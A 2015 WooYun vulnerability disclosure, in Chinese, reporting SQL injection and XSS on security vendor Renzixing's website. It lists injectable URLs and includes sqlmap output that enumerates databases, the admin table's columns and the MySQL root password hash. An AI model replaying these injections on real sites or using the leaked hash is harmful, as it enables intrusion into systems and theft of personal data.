当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0155119

漏洞标题:任子行官网存在多处SQL注入,两处XSS(可直接GET ROOT权限)

相关厂商:任子行网络技术股份有限公司

漏洞作者: 路人甲

提交时间:2015-11-23 11:11

修复时间:2015-11-28 11:12

公开时间:2015-11-28 11:12

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-23: 细节已通知厂商并且等待厂商处理中
2015-11-28: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

任子行网络技术股份有限公司(以下简称任子行)成立于2000年5月,是中国最早涉足网络信息安全领域的企业之一,致力于为国家管理机构、运营商、企事业单位和个人网络信息安全保驾护航。
此次友情渗透,涉及到多个部门的信息,希望重视!
PS:任子行官网存在多处SQL注入,两处XSS-可直接get ROOT权限

详细说明:

任子行官网

多处存在GET型SQL注入:
http://www.1218.com.cn/index.php/product?id=23
http://www.1218.com.cn/index.php/company/recruitment?location=&type=43&position=
http://www.1218.com.cn/index.php/company/recruitment?location=深圳&type=&position=
http://www.1218.com.cn/index.php/company/recruitment?location=深圳 北京&type=&position=
http://www.1218.com.cn/index.php/company/recruitment?type=&position=
http://www.1218.com.cn/index.php/company/recruitment?location=&position=


两处GET型XSS:
http://www.1218.com.cn/index.php/company/recruitment?location=北京&type=&position=
http://www.1218.com.cn/index.php/company/recruitment?location=深圳 北京 武汉&type=&position=


漏洞证明:

[

23:14:55] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.9, PHP 5.5.12
back-end DBMS: MySQL 5.0.11
[23:14:55] [INFO] fetching database names
[23:14:55] [INFO] fetching number of databases
[23:14:55] [INFO] retrieved: 6
[23:15:02] [INFO] retrieved: information_schema
[23:17:18] [INFO] retrieved: m[23:17:34] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry
the request
ysql
[23:18:22] [INFO] retrieved: performance_schema
[23:21:10] [INFO] retrieved: rzxwz
[23:21:55] [INFO] retrieved: surfilter
[23:23:04] [INFO] retrieved: tes[23:23:31] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to
retry the request
[23:23:33] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
t
available databases [6]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] rzxwz
[*] surfilter
[*] test


Database: rzxwz
[23 tables]
+-------------------+
| ci_addonarticle |
| ci_admin |
| ci_admin_role |
| ci_archives |
| ci_arctiny |
| ci_arctype |
| ci_attachment |
| ci_channeltype |
| ci_city |
| ci_form |
| ci_log |
| ci_login_log |
| ci_member |
| ci_menu |
| ci_province |
| ci_search |
| ci_search_keyword |
| ci_sessions |
| ci_stepselect |
| ci_sys_enum |
| ci_sysconfig |
| ci_system_node |
| ci_table |
+-------------------+


Database: rzxwz
Table: ci_admin
[21 columns]
+---------------+-------------+
| Column | Type |
+---------------+-------------+
| answer | varchar(50) |
| birthday | varchar(10) |
| cardid | varchar(18) |
| createTime | int(11) |
| email | varchar(50) |
| group_id | smallint(6) |
| id | int(11) |
| lastLoginIp | int(11) |
| lastLoginTime | int(11) |
| loginCount | int(11) |
| mobile | varchar(30) |
| modifyTime | int(11) |
| msn | varchar(50) |
| name | varchar(30) |
| pass | varchar(32) |
| phone | varchar(30) |
| posts | varchar(50) |
| qq | varchar(20) |
| question | varchar(50) |
| realname | varchar(50) |
| state | tinyint(4) |
+---------------+-------------+


database management system users password hashes:
[*] root [1]:
password hash: *732B4F7C96A81D8135BDDA8B4085A2D759892DE0
[23:34:26] [INFO] Fetched data logged to text files under 'E:\Python27\sqlmap\output\www.1218.com.cn'
[*] shutting down at: 23:34:26


QQ截图20151122233640.png


http://www.1218.com.cn/index.php/company/recruitment?location=%E5%8C%97%E4%BA%AC&type=&position=TEST


QQ图片20151123001908.png


http://www.1218.com.cn/index.php/company/recruitment?type=&position=&location=TEST


4.png


修复方案:

对于安全厂商来说,WEB安全方面,你们比我懂!我只是个小白!

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-11-28 11:12

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

2015-11-30:正在处理中


漏洞评价:

评价